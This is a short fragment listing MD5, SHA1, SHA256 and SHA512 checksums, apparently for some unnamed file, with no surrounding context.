MD5d637394c4cb1975db7c1139fb95004e2
SHA1a7227904708c0ecd5fd27267caf33505f9520781
SHA25642f5ce44deb360d03d10b24ab320c8216c24ec51c3b1f575602a05ead24e2564
SHA5120a4de73752aa0453626e447ffa8a54acf95d4a5311f76c69e0e08b1e08ca5b72b5c2a379085cd99cb5c48c988e47be32ff56c96fb7c28a2c073eda900414d7f2